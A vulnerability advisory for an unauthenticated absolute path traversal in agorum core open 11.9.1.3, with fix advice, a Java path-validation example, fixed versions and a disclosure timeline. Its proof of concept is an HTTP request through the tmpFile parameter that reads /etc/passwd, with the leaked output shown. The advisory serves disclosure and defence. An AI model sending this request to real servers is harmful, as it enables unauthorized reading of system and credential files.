usd-2025-0022 | Agorum core open 11.9.1.3-1857 - Absolute Path Traversal

Product: Agorum core open
Affected Version: 11.9.1.3-1857
Vulnerability Type: Absolute Path Traversal (CWE-36)
Security Risk: High
Vendor: Agorum
Vendor URL: https://www.agorum.com/
Vendor acknowledged vulnerability: Yes
Vendor Status: Fixed
CVE Number: Requested
CVE Link: Requested
Advisory ID: usd-2025-0022

Description

agorum core is an open-source Enterprise Content Management (ECM) system developed by agorum Software GmbH in Germany. It offers a modular, highly customizable platform for document management, workflow automation, and digital collaboration.

Proof of Concept

The dynawebservices component of agorum core permits an attacker to read arbitrary files on the system without authentication, because the tmpFile parameter is used as a file path without being restricted to the intended temporary directory. The following request can be used to read the /etc/passwd file:

GET /dynawebservices/wsfiling/?action=getTemp&tmpFile=/etc/passwd HTTP/1.1
Host: localhost
Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Upgrade-Insecure-Requests: 1
[...]

The server's response includes the full content of the requested file, as shown in the following output:

HTTP/1.1 200 OK
X-Powered-By: agorum core
Content-Length: 3510
Date: Mon, 28 Apr 2025 06:40:05 GMT
Server: Apache-Coyote/1.1

root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
[...]

Fix

It is recommended to validate and sanitize user input so that absolute paths and dangerous path characters are rejected. Always use relative paths for file access to prevent users from navigating outside the intended directories. Implement a whitelist that restricts file access to specific, trusted locations, and limit file system permissions of the service to the files and directories it actually needs.

Users of agorum core open should upgrade to version 11.9.2 or 11.10.1.
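As an added illustration of the recommended fix (not agorum's own code), the following Java resolver accepts only a relative tmpFile parameter, canonicalizes it against a single whitelisted temporary directory, and rejects anything that resolves outside that directory, including absolute paths, ".." segments and symlinks. The class name, the temp root and the sample file names are assumptions for the example.

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;

// Hypothetical replacement for an unchecked "tmpFile -> File" lookup.
public final class TempFileResolver {
    private final Path tempRoot;

    public TempFileResolver(Path tempRoot) throws IOException {
        // Canonicalize the whitelisted directory once so containment checks compare like with like.
        this.tempRoot = tempRoot.toRealPath();
    }

    /** Returns the canonical path of a file inside the temp root, or throws if the input escapes it. */
    public Path resolve(String tmpFile) throws IOException {
        if (tmpFile == null || tmpFile.isEmpty() || tmpFile.indexOf('\0') >= 0) {
            throw new IllegalArgumentException("missing or malformed tmpFile");
        }
        Path requested = Paths.get(tmpFile);
        // Absolute paths such as /etc/passwd are never legitimate here: reject before touching the FS.
        if (requested.isAbsolute()) {
            throw new SecurityException("absolute paths are not permitted");
        }
        // Resolve relative to the whitelisted root and collapse "." / ".." lexically first.
        Path candidate = tempRoot.resolve(requested).normalize();
        if (!candidate.startsWith(tempRoot)) {
            throw new SecurityException("path escapes the temp directory");
        }
        // toRealPath follows symlinks, so a link inside the root pointing at /etc/passwd fails here.
        Path real = candidate.toRealPath();
        if (!real.startsWith(tempRoot) || !Files.isRegularFile(real)) {
            throw new SecurityException("resolved path is outside the temp directory or not a regular file");
        }
        return real;
    }

    public static void main(String[] args) throws IOException {
        Path root = Files.createTempDirectory("tmpfile-demo");          // constructed sample root
        Files.write(root.resolve("export.txt"), "sample".getBytes());   // constructed allowed file
        TempFileResolver resolver = new TempFileResolver(root);
        System.out.println("allowed: " + resolver.resolve("export.txt"));
        for (String bad : new String[] {"/etc/passwd", "../../etc/passwd"}) {
            try {
                resolver.resolve(bad);
            } catch (SecurityException e) {
                System.out.println("rejected " + bad + ": " + e.getMessage());
            }
        }
    }
}
```

Authentication on the endpoint is a separate control; this check only bounds which files an already-authorized caller can reach.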

References

Timeline

  • 2025-05-05: First contact request via email.
  • 2025-05-05: The vendor confirmed receiving our report and began investigating the finding.
  • 2025-05-07: The vendor informed us that a fix is in the works.
  • 2025-05-15: The vendor addressed and fixed the vulnerability in its cloud instances.
  • 2025-05-30: The vendor released fixed versions 11.9.2 and 11.10.1.
  • 2025-06-27: This advisory is published.

Credits

This security vulnerability was identified by Jakob Steeg, Roman Hergenreder, Florian Kimmes, Kai Glauber, DR and Ole Wagner of usd AG.